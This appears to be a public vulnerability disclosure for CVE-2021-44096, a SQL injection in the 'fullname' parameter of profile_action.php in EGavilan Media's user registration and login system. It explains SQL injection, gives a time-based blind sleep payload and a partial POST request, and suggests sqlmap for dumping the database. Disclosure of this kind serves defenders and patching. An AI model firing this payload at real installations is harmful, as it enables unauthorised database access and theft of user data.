# Exploit Title : SQL injection vulnerability in EGavilan Media User-Registration-and-Login-System-With-Admin-Panel 1.0 via “profile_action — update_user” that allows a remote attacker to compromise Application SQL database.
#Exploit Author : Shubham Pandey
#Vendor : EGavilan Media
#Application Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-panel
# CVE: CVE-2021–44096
What is SQL injection :
SQL injection is a type of online security flaw that allows an attacker to interfere with a web application’s database queries. It allows an attacker to see data that they wouldn’t ordinarily be able to see. This could include data belonging to other users or any other information that the app has access to. In many circumstances, an attacker can modify or remove this data, causing the application’s content or behavior to be permanently altered.
By exploiting the login Page parameters Using tool like SQLMAP An attacker can dump entire data from the database. The data dumped can further lead to tampering the confidentiality of the user s personal, transaction details and financial information, various session tokens of the users etc. The data obtained can also be publicly disclosed or used for competitive gains leading to financial loss to an organization.
Vulnerable Parameter: “fullname=”
Steps to Reproduce:
- Put = ‘%2b(select*from(select(sleep(20)))a)%2b’ and verify SQL Database response, if response come after 20 sec that mean Application SQL database is passing given query.
Login page request -
POST /User-Registration-and-Login-System-With-Admin-Panel-master/profile_action.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3. Web Server accept our Payload and by using tools like “Sqlmap” we can see that payload gets executed and Database can be compromised.